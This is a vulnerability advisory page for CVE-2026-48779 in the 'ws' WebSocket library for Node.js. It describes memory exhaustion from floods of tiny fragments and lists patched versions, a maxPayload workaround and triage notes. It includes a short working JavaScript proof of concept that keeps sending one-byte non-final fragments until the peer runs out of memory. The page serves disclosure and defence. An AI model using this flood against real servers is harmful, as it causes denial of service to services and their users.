CVE-2026-48779
Impact
A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.
Proof of concept
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});
Patches
The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).
Workarounds
In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.
Credits
The vulnerability was responsibly disclosed and fixed by Nadav Magier.
CSIRTS triage
- What
- Memory exhaustion can occur from tiny fragments and data chunks, leading to denial of service.
- Who is affected
- Deployments using the affected ws library.
- Urgency
- Remediation is high urgency due to the potential for service disruption.
- Action
- Update to the latest version of the ws library.
AI-assisted analysis generated from the source advisory — verify against the original.
⚡ Watch CVE-2026-48779
Get an email if CVE-2026-48779 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.78% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 52% of all EPSS-scored CVEs.
Advisory coverage (2)
- highGHSA-96hv-2xvq-fx4p: ws: Memory exhaustion DoS from tiny fragments and data chunksghsa · 2026-06-15
- highCVE-2026-48779: ws: Memory exhaustion DoS from tiny fragments and data chunksmsrc · 2026-06-09
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-48779)